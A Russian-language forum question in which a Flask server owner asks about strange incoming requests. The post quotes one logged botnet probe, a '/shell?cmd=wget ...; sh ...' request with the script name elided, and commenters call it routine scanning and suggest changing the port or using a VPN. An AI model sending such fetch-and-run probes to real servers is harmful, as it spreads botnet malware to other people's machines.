# Стоит ли опасаться странных запросов на сервер?

Tags: linux, веб-сервер, администрирование, взлом

Запустил flask сервис на сервере, и постоянно наблюдаю странные запросы от ip крупный компаний (microsoft, apple и т.д.). В некоторых запросах содержится не метод и URL, а просто рандомные символы. Плюс с Китая пришел запрос вида `GET /shell?cmd=wget *script*; sh *script*`. Скрипт для ботнета. Стоит ли что-либо предпринимать в таких ситуациях? Сервер мне практически ничего не стоит, я в любой момент могу просто переустановить ОС, мне больше интересно, что в таких ситуациях делают админы. Спасибо за ответ!

Comment: Если ваш сервер не умеет обрабатывать такие запросы и просто отвечает на них ошибкой, то и пофиг. В вашем flask-сервисе ведь нету никакого `/shell`, я надеюсь?

Comment: Конечно нету:) Я понимаю, что это запросы просто сканирование типичных уязвимостей, но все же это раздражает

Comment: смени порт на 12380 например чтоб не раздражало)

Comment: А я подумал немного, лучше просто дать доступ только внутри сети впн, который запущен на этом же сервере